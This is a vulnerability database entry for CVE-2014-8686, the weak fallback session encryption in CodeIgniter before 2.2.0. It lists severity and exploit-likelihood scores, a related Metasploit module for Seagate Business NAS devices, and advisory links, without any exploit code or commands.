Vulnerability Details : CVE-2014-8686
Public exploit exists!
CodeIgniter before 2.2.0 makes it easier for attackers to decode session cookies by leveraging fallback to a custom XOR-based encryption scheme when the Mcrypt extension for PHP is not available.
Products affected by CVE-2014-8686
- cpe:2.3:a:codeigniter:codeigniter:*:*:*:*:*:*:*:*
Exploit prediction scoring system (EPSS) score for CVE-2014-8686
31.17%
Probability of exploitation activity in the next 30 days
EPSS Score History
~ 96 %
Percentile, the proportion of vulnerabilities that are scored at or less
Metasploit modules for CVE-2014-8686
-
Seagate Business NAS Unauthenticated Remote Command Execution
Disclosure Date: 2015-03-01First seen: 2020-04-26exploit/linux/http/seagate_nas_php_exec_noauthSome Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the
CVSS scores for CVE-2014-8686
Base Score | Base Severity | CVSS Vector | Exploitability Score | Impact Score | Score Source | First Seen |
---|---|---|---|---|---|---|
5.0
|
MEDIUM | AV:N/AC:L/Au:N/C:P/I:N/A:N |
10.0
|
2.9
|
NIST | |
9.8
|
CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
3.9
|
5.9
|
NIST |
CWE ids for CVE-2014-8686
-
Assigned by: nvd@nist.gov (Primary)
References for CVE-2014-8686
-
https://beyondbinary.io/articles/seagate-nas-rce/
Beyond Binary - Advisory: Seagate NAS Remote Code Execution VulnerabilityExploit;Third Party Advisory
-
https://codeigniter.com/userguide2/changelog.html
Change Log : CodeIgniter User GuideVendor Advisory
-
http://packetstormsecurity.com/files/130609/Seagate-Business-NAS-Unauthenticated-Remote-Command-Execution.html
Seagate Business NAS Unauthenticated Remote Command Execution ≈ Packet StormThird Party Advisory;VDB Entry
-
https://www.dionach.com/blog/codeigniter-session-decoding-vulnerability
CodeIgniter Session Decoding Vulnerability | DionachThird Party Advisory
Jump to